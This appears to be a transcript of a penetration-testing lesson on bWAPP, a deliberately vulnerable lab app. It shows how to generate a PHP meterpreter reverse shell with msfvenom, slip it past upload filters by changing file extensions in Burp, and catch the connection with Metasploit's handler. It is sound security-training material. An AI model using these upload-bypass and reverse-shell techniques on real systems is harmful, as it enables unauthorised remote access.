Now, another problem that you will probably see while you're testing unrestricted file upload forms. And sometimes you can bypass restrictions if they're not properly coded. So in this lesson, we are going to be dealing with an unrestricted file upload challenge. You'll see why in a minute. So go to Kali and log into BWAP and open unrestricted file upload page from the menu. Now to see how it works, browse and then choose a picture on your computer. And then upload the file. And you will see a link below. So click it to visit the image. Yeah, I uploaded Sid. So, okay, enable Foxy Proxy. And I'm going to arrange the view here so we can look at the code. Now there's no check for low level, but for medium, file upload check 1 is called. And for high level, check 2 is called. Okay, exit. Now I created a folder for this example before, so I'm going to go to that folder. And I'm going to prepare a shell with MSF Venom tool. So type MSF Venom -p php /meterpreter /reverse TCP for the payload. And lhost equals 192.168.204.128 for the local host address. And lport equals 4443 for the local port in Kali. And the file name. And now we can provide some other parameters to MSF Venom. But we don't need this for this example. So, okay, the payload is created. So here it is in my folder. And this is the content. All right, so we're done here. So then go back to Firefox. We'll browse for images, but choose shell.php and upload it. The upload request is in burp on the right, and you can see the content of the file. And the content type is application xphp. Okay, so let it go. And the link appears on the page. But now before clicking, let's go back to terminal. Now, I forgot to create a handler to capture the reverse connection. So open Metasploit. Okay, so use exploit /multi /handler. And then set payload to PHP reverse TCP. Then you can set localhost to IP address of Kali. And set the local port to 4443. So one more time, we'll show the options. And then type exploit-j to run a background job. Okay, so go to Firefox and click here to see the shell. And the session is open in terminal. So type sessions to list sessions and interact with the session 1. Type get UID for the user of the open shell, and then sysinfo. You see the basic info about the opened shell. Exit the shell, and go back to Firefox. So now I will increase a level. So choose medium, and try to upload the shell again. And there's the error, because these extensions are not allowed. Okay, so let's enable interception, and then upload the shell file again. The request is here in burp. Okay, so change the extension in the file name, and just add 3 to the end. That's all. And send the request. And a link for viewing the uploaded image is right here on the page. But before we do that, let's grab a listener. So start the handler in Metasploit by typing exploit J. Now click the link. Perfect. The session's open. So interact with session 2, and we'll run getUID. The user is www.data. And sysinfo for the basic information about the shell. And then you can exit. Now go back to Firefox again. I'm going to increase the level one more. So select High. And now try to upload the shell file again. And there's our friendly error. But this time it allows only these extensions. Okay, so enable interception and upload the file. And this time the problem can be solved by adding a suitable extension to the file name. And let it go. And there's the upload problem solved. Here's the link. Let's open the terminal and start the handler. Okay, it is done. Now click the link. Hey, nothing happened. There's no session. It doesn't work because the application tries to open an image file. But remember, it's a PHP file, so it gets confused, throws an error without executing it. So we cannot directly execute this shell. But remember, we discovered LFI on BWAP? So we can use LFI to include our shell into the application. But that's for you to do. I know you know how, because we did LFI several times. Have fun with that.